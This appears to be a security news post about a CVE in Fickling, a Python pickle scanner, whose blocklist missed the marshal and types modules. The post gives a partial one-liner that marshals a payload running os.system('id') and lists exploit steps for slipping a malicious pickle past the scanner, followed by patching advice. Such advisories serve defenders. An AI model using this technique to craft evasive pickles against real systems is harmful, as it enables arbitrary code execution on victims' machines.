Fickling, Unsafe Module Bypass

Listen to this Post

The vulnerability is a detection bypass in the Fickling security analysis tool for Python pickle files. Pickle deserialization can execute arbitrary code by importing modules and calling functions. Fickling maintains a blocklist of unsafe modules (like os.system) to flag malicious files. This CVE worked because the `marshal` and `types` modules were missing from that blocklist. An attacker could craft a pickle that uses `marshal.loads()` to deserialize and execute a bytecode payload, then use `types.FunctionType()` to wrap it into a callable function, effectively hiding the malicious code. When Fickling analyzed such a file, its static analysis failed to recognize these imports as dangerous, incorrectly labeling the file as “LIKELY_SAFE.” Additionally, malformed pickles could cause a stack exhaustion crash in the interpreter, though this was a separate denial-of-service issue. The core security failure was the incomplete blocklist, allowing for code execution bypass.
Platform: Fickling
Version: Prior to PR186
Vulnerability : Unsafe Module Bypass
Severity: Critical
date: Report Published 2023

Prediction: 2023-10-15

What Undercode Say:

`fickling -s malicious.pickle`

`python3 -c “import pickle, marshal, types; payload = marshal.dumps((lambda: __import__(‘os’).system(‘id’)).__code__); data = b\”\”\”(…pickle ops…)\”\”\”; pickle.loads(data)”`

`cat safety_result.json | grep severity`

How Exploit:

1. Attacker builds pickle using `marshal.loads()` with bytecode.

2. Pickle uses `types.FunctionType()` to create callable.

3. Victim runs Fickling, gets false ‘LIKELY_SAFE’.

4. Victim unpickles file, executes arbitrary code.

Protection from this CVE

Update to Fickling post-PR186.

Never unpickle untrusted data.

Use tools with allowlists, not blocklists.

Impact:

Arbitrary code execution.

Security tool bypass.

Potential system compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top